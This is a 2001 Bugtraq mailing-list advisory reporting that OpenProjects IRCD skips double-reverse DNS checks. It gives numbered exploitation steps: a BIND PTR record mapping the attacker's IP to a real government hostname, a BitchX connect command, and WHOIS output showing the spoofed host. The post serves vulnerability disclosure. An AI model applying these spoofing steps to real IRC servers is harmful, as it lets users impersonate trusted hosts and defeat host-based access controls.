Bugtraq mailing list archives
OpenProjects IRCD allows DNS spoofing
From: Jukka Mutex <jmutex () Aphex NewGold NET>
Date: Tue, 9 Oct 2001 18:45:19 GMT
* OpenProjects.NET IRCD DNS Spoofing * OpenProjects.net's ircd has some truly braindead code re DNS lookups and doesn't do a proper double-reverse paranoid lookup. In fact, it is possible to spoof any hostname that actually exists on the internet. Here is how to exploit it. 1. Choose a Hostname to Spoof. It is important to keep in mind that you must choose a hostname that actually exists, for our example, we will use 'gary7.nsa.gov' 2. Point Your Reverse Lookup To The Hostname. For our example, we will put the following in our BIND zonefile: 47.222.42.209.in-addr.arpa. IN PTR gary7.nsa.gov. Where we will assume you are using the same IP I used, 209.42.222.47. 3. Connect To A Vulnerable IRC Server. BitchX -H 209.42.222.47 jmutex asimov.openprojects.net Try a WHOIS on yourself. /whois jmutex | jmutex (jmutex () gary7 nsa gov) (Government) ½ ircname : Jukka Mutex ½ server : asimov.openprojects.net (Fremont, CA) : idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001) Credits: jmutex () newgold net, chrisj () newgold net, lilo Found by: Joseph Mallett Affects: OpenProjects u2.10.05.18.(ipcheck4-5) Rumored to Affect: Hybrid Copyright (c) 2001 Joseph Mallett. All rights reserved.
Current thread:
- OpenProjects IRCD allows DNS spoofing Jukka Mutex (Oct 09)
- Re: OpenProjects IRCD allows DNS spoofing Matthew S. Hallacy (Oct 14)